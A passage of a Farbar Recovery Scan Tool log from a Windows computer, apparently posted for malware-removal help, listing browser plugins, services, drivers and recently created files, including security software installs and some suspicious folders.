FF Extension: (McAfee Anti-Spam Thunderbird Extension) - C:\Program Files\McAfee\MSK [2021-04-28] [Legacy] [not signed] FF Plugin: @mcafee.com/MSC,version=10 -> C:\Program Files\McAfee\MSC\npMcSnFFPl64.dll [2021-03-31] (McAfee, LLC -> ) FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [2021-05-02] (Microsoft Corporation -> Microsoft Corporation) FF Plugin-x32: @mcafee.com/MSC,version=10 -> C:\Program Files (x86)\McAfee\MSC\npMcSnFFPl.dll [2021-03-31] (McAfee, LLC -> ) FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2021-04-08] (Microsoft Corporation -> Microsoft Corporation) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\NPSPWRAP.DLL [2021-04-08] (Microsoft Corporation -> Microsoft Corporation) FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Air\nppdf32.dll [2021-03-06] (Adobe Inc. -> Adobe Systems Inc.) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2021-04-21] (Adobe Inc. -> Adobe Systems Inc.) Chrome: ======= CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] CHR HKLM-x32\...\Chrome\Extension: [ihcjicgdanjaechkgeegckofjjedodee] ==================== Services (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [169672 2021-01-25] (Adobe Inc. -> Adobe Inc.) R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3780296 2021-02-17] (Adobe Inc. -> Adobe Systems, Incorporated) S4 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [3548360 2021-02-17] (Adobe Inc. -> Adobe Systems, Incorporated) R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [8798600 2021-04-21] (Microsoft Corporation -> Microsoft Corporation) R2 CxUtilSvc; C:\Program Files\Conexant\SAII\CxUtilSvc.exe [132096 2016-05-12] (Conexant Systems, Inc.) [File not signed] S2 Dolby DAX2 API Service; C:\Program Files\Dolby\Dolby DAX2\DAX2_API\DolbyDAX2API.exe [194048 2017-03-07] (Dolby Laboratories, Inc. -> Dolby Laboratories, Inc.) S3 FvSvc; C:\Program Files\NVIDIA Corporation\FrameViewSDK\nvfvsdksvc_x64.exe [409456 2021-03-30] (NVIDIA Corporation -> NVIDIA) R2 ImControllerService; C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [81824 2021-03-14] (Lenovo -> Lenovo Group Ltd.) S2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe [7391408 2021-05-06] (Malwarebytes Inc -> Malwarebytes) R2 McAfee WebAdvisor; C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe [971976 2021-04-30] (McAfee, LLC -> McAfee, LLC) R2 McAPExe; C:\Program Files\Common Files\McAfee\VSCore_20_12\McApExe.exe [780032 2021-03-31] (McAfee, LLC -> McAfee, LLC) S3 McAWFwk; C:\Program Files\Common Files\McAfee\ActWiz\McAWFwk.exe [583344 2020-11-03] (McAfee, LLC -> McAfee, LLC) R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\4.1.106.0\\McCSPServiceHost.exe [2787160 2021-03-29] (McAfee, LLC -> McAfee, LLC) S3 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe [645736 2020-12-10] (McAfee, Inc. -> McAfee, LLC) R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe [645736 2020-12-10] (McAfee, Inc. -> McAfee, LLC) R3 mfevtp; C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe [645736 2020-12-10] (McAfee, Inc. -> McAfee, LLC) R2 ModuleCoreService; C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe [1631736 2021-03-29] (McAfee, LLC -> McAfee, LLC) S3 OfficeSvcManagerAddons; C:\WINDOWS\system32\dllhost.exe /Processid:{2CA2E202-932F-4BA2-8771-195BB86398F5} [21312 2020-10-16] (Microsoft Windows -> Microsoft Corporation) R2 PEFService; C:\Program Files\Common Files\McAfee\PEF\CORE\PEFService.exe [4241112 2021-03-29] (McAfee, LLC -> McAfee, LLC) S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2103.7-0\NisSrv.exe [2624104 2021-04-11] (Microsoft Windows Publisher -> Microsoft Corporation) S3 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2103.7-0\MsMpEng.exe [128376 2021-04-11] (Microsoft Windows Publisher -> Microsoft Corporation) ===================== Drivers (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) S3 AppleKmdfFilter; C:\WINDOWS\System32\drivers\AppleKmdfFilter.sys [20640 2018-05-10] (WDKTestCert build,131474841775766162 -> Apple Inc.) S3 AppleLowerFilter; C:\WINDOWS\System32\drivers\AppleLowerFilter.sys [35976 2020-10-09] (WDKTestCert build,132303256403278908 -> Apple Inc.) R3 cfwids; C:\WINDOWS\System32\drivers\cfwids.sys [75712 2020-12-11] (McAfee, Inc. -> McAfee, LLC) S3 HipShieldK; C:\WINDOWS\System32\drivers\HipShieldK.sys [218960 2020-05-26] (McAfee, LLC -> McAfee, Inc.) R2 MBAMChameleon; C:\WINDOWS\System32\Drivers\MbamChameleon.sys [220752 2021-05-06] (Malwarebytes Inc -> Malwarebytes) S0 MbamElam; C:\WINDOWS\System32\DRIVERS\MbamElam.sys [20936 2019-02-01] (Microsoft Windows Early Launch Anti-malware Publisher -> Malwarebytes) S3 MBAMSwissArmy; C:\WINDOWS\System32\Drivers\mbamswissarmy.sys [248992 2021-05-06] (Malwarebytes Inc -> Malwarebytes) R2 McPvDrv; C:\WINDOWS\system32\drivers\McPvDrv.sys [89112 2021-01-18] (McAfee, LLC -> McAfee, LLC) R3 mfeaack; C:\WINDOWS\System32\drivers\mfeaack.sys [544704 2020-12-11] (McAfee, Inc. -> McAfee, LLC) R3 mfeavfk; C:\WINDOWS\System32\drivers\mfeavfk.sys [385984 2020-12-11] (McAfee, Inc. -> McAfee, LLC) S0 mfeelamk; C:\WINDOWS\System32\drivers\mfeelamk.sys [85944 2020-12-11] (Microsoft Windows Early Launch Anti-malware Publisher -> McAfee, LLC) R3 mfefirek; C:\WINDOWS\System32\drivers\mfefirek.sys [522176 2020-12-11] (McAfee, Inc. -> McAfee, LLC) R0 mfehidk; C:\WINDOWS\System32\drivers\mfehidk.sys [1027520 2020-12-11] (McAfee, Inc. -> McAfee, LLC) R3 mfencbdc; C:\WINDOWS\System32\DRIVERS\mfencbdc.sys [608192 2020-12-17] (McAfee, Inc. -> McAfee LLC.) S3 mfencrk; C:\WINDOWS\System32\DRIVERS\mfencrk.sys [107968 2020-12-17] (McAfee, Inc. -> McAfee LLC.) R3 mfeplk; C:\WINDOWS\System32\drivers\mfeplk.sys [116672 2020-12-11] (McAfee, Inc. -> McAfee, LLC) S3 mferkdet; C:\WINDOWS\System32\drivers\mferkdet.sys [125688 2021-04-25] (McAfee, Inc. -> McAfee, Inc.) R0 mfewfpk; C:\WINDOWS\System32\drivers\mfewfpk.sys [252352 2020-12-11] (McAfee, Inc. -> McAfee, LLC) S3 tapnordvpn; C:\WINDOWS\System32\drivers\tapnordvpn.sys [44896 2018-07-24] (TEFINCOM S.A. -> The OpenVPN Project) S3 WdBoot; C:\WINDOWS\system32\drivers\wd\WdBoot.sys [49560 2021-04-11] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation) S3 WdFilter; C:\WINDOWS\system32\drivers\wd\WdFilter.sys [421088 2021-04-11] (Microsoft Windows -> Microsoft Corporation) S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [72928 2021-04-11] (Microsoft Windows -> Microsoft Corporation) ==================== NetSvcs (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== One month (created) (Whitelisted) ========= (If an entry is included in the fixlist, the file/folder will be moved.) 2021-05-06 15:34 - 2021-05-06 15:36 - 000032925 _____ C:\Users\FRANCIS\Downloads\FRST.txt 2021-05-06 15:33 - 2021-05-06 15:35 - 000000000 ____D C:\FRST 2021-05-06 15:32 - 2021-05-06 15:32 - 002298368 _____ (Farbar) C:\Users\FRANCIS\Downloads\FRST64.exe 2021-05-06 14:48 - 2021-05-06 14:48 - 000000000 ___HD C:\ProgramData\Kawmq 2021-05-06 14:25 - 2021-05-06 14:25 - 001310832 _____ (Google LLC) C:\Users\FRANCIS\Downloads\ChromeSetup.exe 2021-05-06 11:57 - 2021-05-06 11:57 - 001687040 _____ C:\WINDOWS\system32\libcrypto.dll 2021-05-06 11:56 - 2021-05-06 11:56 - 002755584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.tlb 2021-05-06 11:56 - 2021-05-06 11:56 - 002755584 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.tlb 2021-05-06 11:56 - 2021-05-06 11:56 - 001314120 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi 2021-05-06 11:56 - 2021-05-06 11:56 - 000700928 _____ C:\WINDOWS\system32\FsNVSDeviceSource.dll 2021-05-06 11:56 - 2021-05-06 11:56 - 000011351 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim 2021-05-06 11:54 - 2021-05-06 11:54 - 001163776 _____ C:\WINDOWS\system32\MBR2GPT.EXE 2021-05-06 11:53 - 2021-05-06 11:53 - 001823816 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi 2021-05-06 11:53 - 2021-05-06 11:53 - 001393504 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi 2021-05-06 11:53 - 2021-05-06 11:53 - 000060928 _____ C:\WINDOWS\system32\runexehelper.exe 2021-05-06 11:51 - 2021-05-06 11:51 - 000165888 _____ C:\WINDOWS\system32\DataStoreCacheDumpTool.exe 2021-05-06 11:51 - 2021-05-06 11:51 - 000013312 _____ C:\WINDOWS\system32\agentactivationruntimestarter.exe 2021-05-06 11:38 - 2021-05-06 11:38 - 000002040 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes.lnk 2021-05-06 11:38 - 2021-05-06 11:38 - 000002028 _____ C:\Users\Public\Desktop\Malwarebytes.lnk 2021-05-06 11:38 - 2021-05-06 11:38 - 000002028 _____ C:\ProgramData\Desktop\Malwarebytes.lnk 2021-05-06 11:38 - 2021-05-06 11:38 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\mbam 2021-05-06 11:37 - 2021-05-06 11:37 - 000220752 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MbamChameleon.sys 2021-05-06 11:36 - 2021-05-06 11:36 - 000248992 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamswissarmy.sys 2021-05-06 11:35 - 2021-05-06 11:34 - 000199128 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbae64.sys 2021-05-06 11:34 - 2021-05-06 11:34 - 000000000 ____D C:\ProgramData\Malwarebytes 2021-05-06 11:28 - 2021-05-06 11:28 - 000000000 ____D C:\Program Files\Malwarebytes 2021-05-06 09:27 - 2021-05-06 09:27 - 002078632 _____ (Malwarebytes) C:\Users\FRANCIS\Downloads\MBSetup.exe 2021-05-05 21:10 - 2021-05-06 10:23 - 000000000 ____D C:\Users\FRANCIS\Desktop\Hello Paris 2021-05-05 13:04 - 2021-05-05 13:05 - 000736768 _____ C:\Users\FRANCIS\Downloads\mws_gen_ode_ppt_euler.ppt 2021-05-04 20:39 - 2021-05-04 20:40 - 003578240 _____ (RCS LT) C:\Users\FRANCIS\Downloads\CCSetup.exe 2021-05-04 18:04 - 2021-05-04 18:04 - 000001134 _____ C:\Users\Public\Desktop\Web Navigation.lnk 2021-05-04 18:04 - 2021-05-04 18:04 - 000001134 _____ C:\ProgramData\Desktop\Web Navigation.lnk 2021-05-04 17:36 - 2019-02-01 11:20 - 000020936 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MbamElam.sys 2021-05-04 17:35 - 2021-05-04 17:35 - 000000000 ____D C:\WINDOWS\system32\Drivers\etc\BACKUP 2021-05-04 09:30 - 2021-05-04 09:30 - 000125168 _____ (Zoom Video Communications, Inc.) C:\Users\FRANCIS\Downloads\Zoom_cm_ds_mv9ZFe0KOjFvdR5MS6xrZlbbY96oVd7AAzLVq@UT4O-2pbNxQCn-E8_kc4bbc386e4a84bbc_.exe 2021-05-03 21:46 - 2021-05-03 21:46 - 000112099 _____ C:\Users\FRANCIS\Downloads\Enriquez_JamesCarl_MP14.pdf 2021-05-03 20:58 - 2021-05-03 20:58 - 000012872 _____ (SurfRight B.V.) C:\WINDOWS\system32\bootdelete.exe 2021-05-03 19:54 - 2021-05-03 19:54 - 000206596 _____ C:\Users\FRANCIS\Downloads\Pentecostes_Daniela_MP12.pdf 2021-05-02 19:45 - 2021-05-02 19:45 - 001345893 _____ C:\Users\FRANCIS\Downloads\PS2.1-Ramos-Riano-San-Pedro-Santiago.pdf 2021-05-02 18:35 - 2021-05-02 18:35 - 000043135 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210502-103502.zip 2021-05-02 17:52 - 2021-05-02 18:02 - 000000000 ____D C:\Users\FRANCIS\Desktop\Quarterpound 2021-05-02 16:41 - 2021-05-02 16:41 - 000001131 _____ C:\Users\FRANCIS\Desktop\CLUE Classic.lnk 2021-05-02 16:41 - 2021-05-02 16:41 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CLUE Classic 2021-05-02 16:16 - 2021-05-02 16:16 - 000000000 ____D C:\Users\FRANCIS\Desktop\fonts-main 2021-05-02 16:14 - 2021-04-19 10:46 - 654079606 _____ C:\Users\FRANCIS\Desktop\fonts-main.zip 2021-05-02 16:02 - 2021-05-02 17:07 - 000000000 ____D C:\Program Files (x86)\CLUE Classic 2021-05-02 15:51 - 2021-05-02 15:51 - 000000000 ____D C:\Users\FRANCIS\Downloads\Adobe Master Collection 2021 RUS-ENG v4 - [FileWomen] 2021-05-02 15:42 - 2021-05-02 15:43 - 000000000 ____D C:\Users\FRANCIS\AppData\LocalLow\BitTorrent 2021-05-02 15:26 - 2021-05-02 15:26 - 000000000 ____D C:\Program Files (x86)\ReflexiveArcade 2021-05-01 20:38 - 2021-05-01 20:38 - 000427332 _____ C:\Users\FRANCIS\Downloads\Frankenstein-by-Shelley.txt 2021-05-01 20:38 - 2021-05-01 20:38 - 000000042 _____ C:\Users\FRANCIS\Downloads\simple.txt 2021-05-01 20:35 - 2021-05-01 20:35 - 000675711 _____ C:\Users\FRANCIS\Downloads\Distances.xlsx 2021-05-01 19:09 - 2021-05-01 19:09 - 000012176 _____ C:\Users\FRANCIS\Downloads\Introduction-to-Programming-with-MATLAB-solutions--master.zip 2021-05-01 19:09 - 2019-03-13 12:58 - 000000000 ____D C:\Users\FRANCIS\Desktop\Introduction-to-Programming-with-MATLAB-solutions--master 2021-05-01 18:42 - 2021-05-01 18:42 - 002308003 _____ C:\Users\FRANCIS\Downloads\introduction-to-programming-with-matlab-master.zip 2021-05-01 10:23 - 2021-05-01 10:23 - 000113329 _____ C:\Users\FRANCIS\Downloads\financials sample template format only(1)(1).xlsx 2021-04-30 18:04 - 2021-04-30 18:04 - 000112886 _____ C:\Users\FRANCIS\Downloads\financials sample template format (incomplete) (1).xlsx 2021-04-30 17:03 - 2021-04-30 17:04 - 000026514 _____ C:\Users\FRANCIS\Downloads\Book1-KeyAssumptions.xlsx 2021-04-29 20:20 - 2021-04-29 20:20 - 000959197 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210429-121954.zip 2021-04-29 20:05 - 2021-04-29 20:05 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\Recovery Toolbox for RAR 2021-04-29 18:39 - 2021-04-29 18:40 - 000931837 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210429-103853.zip 2021-04-29 18:37 - 2021-04-29 18:37 - 001064473 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210429-103705.zip 2021-04-29 17:22 - 2021-04-29 17:22 - 000053020 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210429-092143.zip 2021-04-28 14:50 - 2021-04-28 14:51 - 000112886 _____ C:\Users\FRANCIS\Downloads\financials sample template format (incomplete).xlsx 2021-04-28 13:20 - 2021-04-28 13:20 - 000003018 _____ C:\WINDOWS\system32\Tasks\McInstruTrack 2021-04-28 13:17 - 2021-04-28 13:17 - 000002138 _____ C:\Users\Public\Desktop\McAfee® Total Protection.lnk 2021-04-28 13:17 - 2021-04-28 13:17 - 000002138 _____ C:\ProgramData\Desktop\McAfee® Total Protection.lnk 2021-04-28 13:15 - 2021-05-06 14:47 - 000000000 __RSD C:\Users\FRANCIS\Documents\McAfee Vaults 2021-04-28 13:15 - 2021-04-28 13:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee 2021-04-28 13:15 - 2021-04-28 13:15 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\McAfee File Lock 2021-04-28 13:15 - 2021-01-18 02:58 - 000089112 _____ (McAfee, LLC) C:\WINDOWS\system32\Drivers\McPvDrv.sys 2021-04-28 13:15 - 2020-05-26 00:12 - 000089096 _____ (McAfee, LLC) C:\WINDOWS\system32\Drivers\SET8D4E.tmp 2021-04-28 13:14 - 2020-05-26 00:11 - 000218960 _____ (McAfee, Inc.) C:\WINDOWS\system32\Drivers\HipShieldK.sys 2021-04-28 13:08 - 2021-04-28 16:51 - 000003316 _____ C:\WINDOWS\system32\Tasks\McAfeeLogon 2021-04-28 13:01 - 2021-05-05 14:53 - 000000000 ____D C:\Program Files (x86)\McAfee 2021-04-28 13:01 - 2021-04-28 16:53 - 000000000 ____D C:\Program Files\McAfee 2021-04-28 13:01 - 2021-04-28 16:52 - 000000000 ____D C:\Program Files\Common Files\McAfee 2021-04-28 13:01 - 2021-04-28 14:07 - 000003706 _____ C:\WINDOWS\system32\Tasks\McAfee Remediation (Prepare) 2021-04-28 13:01 - 2021-04-28 13:04 - 000000000 ____D C:\Program Files\McAfee.com 2021-04-28 13:01 - 2021-04-28 13:01 - 000000000 ____D C:\Program Files\Common Files\AV 2021-04-28 09:18 - 2021-04-28 13:22 - 000000049 _____ C:\Users\FRANCIS\AppData\Roaming\MCVi2UserDetail.ini 2021-04-28 09:10 - 2021-04-28 09:14 - 005794408 _____ (McAfee, LLC) C:\Users\FRANCIS\Downloads\mcafee_trial_setup_433.0207.3919_key.exe 2021-04-27 19:32 - 2021-04-27 19:32 - 000205659 _____ C:\Users\FRANCIS\Downloads\chapter_9__Practice_questions_and_solutions.docx.pdf 2021-04-27 18:30 - 2021-04-27 18:30 - 000178921 _____ C:\Users\FRANCIS\Downloads\chapter_8_practice_questions_solution.docx.pdf 2021-04-27 18:06 - 2021-04-27 18:08 - 004323668 _____ C:\Users\FRANCIS\Downloads\Gas Power Cycle.zip 2021-04-27 18:06 - 2021-04-27 18:06 - 001022464 _____ C:\Users\FRANCIS\Downloads\Lecture 2 Gas Power Cycle.ppt 2021-04-27 18:04 - 2021-04-27 18:05 - 004372125 _____ C:\Users\FRANCIS\Downloads\Rankine Cycle with Regeneration.zip 2021-04-27 09:00 - 2021-04-27 09:00 - 000030252 _____ C:\WINDOWS\system32\servers.def.lkg 2021-04-27 09:00 - 2021-04-27 09:00 - 000030252 _____ C:\WINDOWS\system32\servers.def 2021-04-27 09:00 - 2021-04-27 09:00 - 000011324 _____ C:\WINDOWS\system32\uat64.vpx 2021-04-27 09:00 - 2021-04-27 09:00 - 000003313 _____ C:\WINDOWS\system32\servers.def.vpx 2021-04-27 09:00 - 2021-04-27 09:00 - 000003304 _____ C:\WINDOWS\system32\.tmp 2021-04-27 09:00 - 2021-04-27 09:00 - 000000604 _____ C:\WINDOWS\system32\prod-pgm.vpx 2021-04-27 09:00 - 2021-04-27 09:00 - 000000342 _____ C:\WINDOWS\system32\prod-vps.vpx 2021-04-26 20:34 - 2021-04-26 20:34 - 000282407 _____ C:\Users\FRANCIS\Downloads\Enriquez_JamesCarl_MP10.pdf 2021-04-25 17:25 - 2021-05-06 12:12 - 000000000 ____D C:\WINDOWS\system32\Tasks\McAfee 2021-04-25 17:14 - 2021-04-25 17:14 - 000125688 _____ (McAfee, Inc.) C:\WINDOWS\system32\Drivers\mferkdet.sys 2021-04-25 17:09 - 2020-12-10 20:36 - 000583720 _____ (McAfee, LLC) C:\WINDOWS\system32\mfevtps.exe 2021-04-25 17:08 - 2021-04-28 16:44 - 000000000 ____D C:\ProgramData\McAfee 2021-04-25 16:45 - 2021-05-06 14:34 - 000000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job 2021-04-25 16:44 - 2021-05-06 14:42 - 000388514 _____ C:\WINDOWS\ntbtlog.txt 2021-04-25 11:05 - 2021-04-26 17:39 - 000000000 ____D C:\WINDOWS\system32\Tasks\Avast Software 2021-04-25 11:04 - 2021-04-25 11:04 - 000000000 ____D C:\Program Files\Common Files\Avast Software 2021-04-25 10:25 - 2021-04-25 10:25 - 000220392 _____ (AVAST Software) C:\Users\FRANCIS\Downloads\avast_free_antivirus_setup_online.exe 2021-04-23 21:06 - 2021-04-23 21:24 - 000000000 _RSHD C:\ProgramData\Key-Base 2021-04-23 21:06 - 2021-04-23 21:06 - 000000000 ____D C:\ProgramData\{42AFAFAD-2FE9-D459-E932-738DED275782} 2021-04-23 21:00 - 2021-04-23 21:05 - 009772064 _____ (Stellar Information Technology Pvt Ltd ) C:\Users\FRANCIS\Downloads\StellarRepairforPhoto.exe 2021-04-23 20:31 - 2021-04-23 20:31 - 000000000 ____D C:\Users\FRANCIS\Desktop\Easeus 23 20_31 2021-04-23 16:46 - 2021-04-23 16:46 - 000550953 _____ C:\Users\FRANCIS\Downloads\Rebyu.pdf 2021-04-23 15:43 - 2021-04-23 15:43 - 000528434 _____ C:\Users\FRANCIS\Downloads\MARKETING_PLAN_TECHNICAL_PLAN_PRICING_PLAN.docx.pdf 2021-04-23 15:26 - 2021-04-23 15:27 - 004500974 _____ C:\Users\FRANCIS\Downloads\IE103_FINAL_BUSINESS_PLAN_FACE_SHIELD.docx.pdf 2021-04-23 15:24 - 2021-04-23 15:24 - 000787017 _____ C:\Users\FRANCIS\Downloads\CADELI__A_AMIEL_Technical_Plan_InventorEaze.docx.pdf 2021-04-22 21:21 - 2021-04-23 12:12 - 000000000 ____D C:\Users\FRANCIS\Downloads\sims3worldtool167 2021-04-22 21:18 - 2021-04-22 21:18 - 000008531 _____ C:\Users\FRANCIS\Downloads\sims3worldtool167_archive.torrent 2021-04-21 16:53 - 2021-04-21 16:53 - 000041503 _____ C:\Users\FRANCIS\Downloads\financials sample template format updated 4-21-21.xlsx 2021-04-21 15:55 - 2021-04-21 15:55 - 000000000 ____D C:\Users\FRANCIS\Downloads\PengRobinson 2021-04-21 15:54 - 2021-04-21 15:54 - 000001965 _____ C:\Users\FRANCIS\Downloads\PengRobinson.zip 2021-04-21 15:03 - 2021-04-21 15:03 - 000000000 ____D C:\Users\FRANCIS\Downloads\Lecture 5. Finding the Roots 2021-04-19 09:34 - 2021-04-19 09:34 - 000000000 ____D C:\Users\FRANCIS\Downloads\Mission Gothic 2021-04-18 10:22 - 2021-04-18 10:22 - 000000000 ____D C:\Users\FRANCIS\Downloads\Novecento Carved 2021-04-18 10:21 - 2021-04-18 10:21 - 000000000 ____D C:\Users\FRANCIS\Downloads\Novecento Sans 2021-04-18 10:20 - 2021-04-18 10:21 - 000000000 ____D C:\Users\FRANCIS\Downloads\Novecento Slab 2021-04-18 10:16 - 2021-04-18 10:19 - 000000000 ____D C:\Users\FRANCIS\Downloads\Novecento Slab Rough 2021-04-17 21:49 - 2021-04-17 21:50 - 027357835 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210417-134918.zip 2021-04-17 21:34 - 2021-04-17 21:36 - 025680562 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210417-133438.zip 2021-04-17 20:29 - 2021-04-17 20:30 - 001378716 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210417-122915.zip 2021-04-17 20:27 - 2021-04-17 20:27 - 001391374 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210417-122711.zip 2021-04-17 20:24 - 2021-04-17 20:24 - 001307436 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210417-122359.zip 2021-04-17 20:22 - 2021-04-17 20:22 - 001320474 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210417-122211.zip 2021-04-17 20:15 - 2021-04-17 20:16 - 001642500 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210417-121554.zip 2021-04-17 20:13 - 2021-04-17 20:14 - 001642946 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210417-121341.zip 2021-04-17 18:02 - 2021-04-17 18:03 - 051943779 _____ C:\Users\FRANCIS\Downloads\Problem Exercise 8.7 Power Cycle with regeneration.pdf 2021-04-17 16:37 - 2021-04-17 16:39 - 001959151 _____ C:\Users\FRANCIS\Downloads\Chapter 9. Refrigeration and Liquefaction MCA.pptx 2021-04-17 16:28 - 2021-04-17 16:29 - 001329415 _____ C:\Users\FRANCIS\Downloads\Lecture 5. Finding the Roots.zip 2021-04-16 18:23 - 2021-04-20 09:44 - 000138601 _____ C:\Users\FRANCIS\Downloads\litmusports-results.pptx 2021-04-16 13:26 - 2021-04-16 13:26 - 000231248 _____ C:\WINDOWS\system32\containerdevicemanagement.dll 2021-04-15 20:59 - 2021-04-19 20:45 - 000000000 ____D C:\Users\FRANCIS\Desktop\YB COLLECTION 2021-04-15 16:21 - 2021-04-15 16:21 - 000043972 _____ C:\Users\FRANCIS\Downloads\11401.zip 2021-04-15 11:58 - 2020-08-14 15:59 - 000043416 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\NvModuleTracker.sys 2021-04-14 20:20 - 2021-04-14 20:22 - 000000000 ____D C:\Users\FRANCIS\Downloads\Eurostile Next 2021-04-14 20:20 - 2021-04-14 20:20 - 000000000 ____D C:\Users\FRANCIS\Downloads\American Typewriter 2021-04-14 20:19 - 2021-04-14 20:19 - 000000000 ____D C:\Users\FRANCIS\Downloads\Bebas Neue Pro 2021-04-14 20:18 - 2021-04-14 20:18 - 000000000 ____D C:\Users\FRANCIS\Downloads\Bebas Kai 2021-04-14 20:17 - 2021-04-14 20:18 - 000000000 ____D C:\Users\FRANCIS\Downloads\Bebas Neue 2021-04-14 20:17 - 2021-04-14 20:17 - 000000000 ____D C:\Users\FRANCIS\Downloads\Rosewood 2021-04-14 20:16 - 2021-04-14 20:16 - 000000000 ____D C:\Users\FRANCIS\Downloads\One Stroke Script 2021-04-14 17:44 - 2021-04-14 17:45 - 000714992 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210414-093253.zip 2021-04-14 17:06 - 2021-04-14 17:06 - 000073143 _____ C:\Users\FRANCIS\Downloads\the-sims-sans-cufonfonts.zip 2021-04-14 17:05 - 2021-04-14 17:05 - 000073333 _____ C:\Users\FRANCIS\Downloads\The-Sims-Sans-Font.zip 2021-04-14 16:25 - 2021-04-14 16:25 - 000575764 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210414-082508.zip 2021-04-14 16:24 - 2021-04-14 16:24 - 001638615 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210414-082414.zip 2021-04-14 16:18 - 2021-04-14 16:18 - 001593898 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210414-081827.zip 2021-04-14 16:15 - 2021-04-14 16:16 - 002110967 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210414-081533.zip 2021-04-13 18:08 - 2021-04-13 18:09 - 002648212 _____ C:\Users\FRANCIS\Downloads\eurostile-next-pro-cufonfonts.zip 2021-04-13 17:42 - 2021-04-13 17:42 - 000205230 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-094200.zip 2021-04-13 17:27 - 2021-04-13 17:27 - 000086034 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-092705.zip 2021-04-13 15:22 - 2021-04-13 15:22 - 000094518 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-072238.zip 2021-04-13 15:20 - 2021-04-13 15:20 - 000043667 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-072045.zip 2021-04-13 15:19 - 2021-04-13 15:19 - 000021551 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-071930.zip 2021-04-13 15:17 - 2021-04-13 15:17 - 001318241 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-071720.zip 2021-04-13 15:16 - 2021-04-13 15:16 - 001336842 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-071602.zip 2021-04-13 12:34 - 2021-04-13 12:35 - 000000000 ____D C:\Users\FRANCIS\Downloads\Akko 2021-04-13 12:34 - 2021-04-13 12:34 - 000000000 ____D C:\Users\FRANCIS\Downloads\FF Trademarker 2021-04-13 12:27 - 2021-04-13 12:28 - 000398306 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-042745.zip 2021-04-13 12:23 - 2021-04-13 